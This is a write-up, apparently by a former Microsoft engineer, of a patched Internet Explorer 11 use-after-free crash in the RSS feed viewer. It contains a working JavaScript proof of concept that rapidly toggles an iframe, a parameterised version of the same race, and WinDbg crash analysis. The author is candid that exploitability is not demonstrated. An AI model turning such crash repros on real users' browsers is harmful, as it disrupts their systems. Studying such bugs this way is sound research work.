Rapidly alternating an iframe between a local RSS XML file and about:blank at 100 ms intervals crashed IE11 in IEFRAME!CFeedViewer::_HandleZoomChange. The WinDbg !exploitable extension classified the crash as PROBABLY_EXPLOITABLE: the value read from the faulting address controlled a branch target, which is consistent with a use-after-free.
<iframe name="ifrName" width="200" height="30"></iframe>
<script language="JavaScript">
// Toggle flag: sch is created as an implicit global on the first call and
// flipped on every call, so successive ticks take alternate branches.
function main()
{
    if (sch = !window.sch)
    {
        // Navigate the named frame to a local RSS file; IE renders it
        // with the feed viewer (CFeedViewer).
        ifrName.location = "rss.xml";
    }
    else
    {
        // Retarget the same named frame to a blank document, tearing
        // the feed viewer down again.
        window.open("about:blank", "ifrName");
    }
}
// Alternate between the two states every 100 ms.
setInterval('main()', 100);
</script>
With setInterval('main()', 100) driving main(), the iframe oscillated between RSS rendering mode and a blank document, and the RSS viewer component (CFeedViewer) was torn down and re-initialized faster than it could clean up. When _HandleZoomChange fired during the zoom-state transition triggered by the markup switch, eax was null, so the mov ecx, dword ptr [eax] at +0x32 raised an access violation. The call chain runs through CZoomState::LoadPersistedZoomState → COmWindowProxy::SwitchMarkup, which suggests the feed viewer's reference to its hosting window was released before the zoom callback completed. One caveat on the rating: !exploitable's classification is heuristic, and because eax was null at the fault the read hit a fixed low address. Turning the branch-selection primitive into control of execution would require the released reference to point into attacker-controlled memory rather than at null, which this repro does not demonstrate.
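As an added example (not part of the original repro), here is a parameterised version of the same navigation race. It separates the scheduling from the DOM so the logic can be unit-tested outside a browser, cycles through any list of targets, and writes the tick count into the window title so a crash can be matched to the iteration it happened on. The frame name, interval and target list are assumptions carried over from the repro above.

```javascript
// Added example, not the original repro: parameterised iframe navigation race.

// Documents to alternate between. Constructed for this example; "rss.xml"
// stands in for any local RSS file that IE would render with its feed viewer.
const TARGETS = ["rss.xml", "about:blank"];

// Pure scheduling step: given the tick count, decide which target to load
// and how. Even ticks assign location on the frame window, odd ticks retarget
// the frame by name via window.open, mirroring the two branches of the
// original repro when exactly two targets are used.
function planTick(tick, targets) {
  const url = targets[tick % targets.length];
  return { tick: tick, url: url, method: tick % 2 === 0 ? "location" : "open" };
}

// Apply one planned step to a window. `win` is passed in rather than taken
// from the global scope so the function can be driven with a fake window.
function applyTick(plan, win, frameName) {
  const frame = win.frames[frameName];
  if (!frame) {
    throw new Error("no frame named " + frameName);
  }
  if (plan.method === "location") {
    frame.location = plan.url;        // navigate the frame directly
  } else {
    win.open(plan.url, frameName);    // retarget the named frame
  }
  // The title shows up in the crashed window's caption and in task manager,
  // which makes it easy to note the iteration a dump corresponds to.
  win.document.title = "tick " + plan.tick + " -> " + plan.url;
  return plan;
}

// Start the race; returns the interval id so the caller can clearInterval it.
function startRace(win, frameName, intervalMs, targets) {
  let tick = 0;
  return win.setInterval(function () {
    applyTick(planTick(tick++, targets), win, frameName);
  }, intervalMs);
}

// Only hook the DOM when running inside a page that has the named iframe.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  window.addEventListener("load", function () {
    startRace(window, "ifrName", 100, TARGETS);
  });
}
```

To use it, drop the block into a page that contains `<iframe name="ifrName"></iframe>`; changing TARGETS or the interval lets you check whether the crash is specific to the RSS/blank pair and the 100 ms cadence or reproduces more broadly.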
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.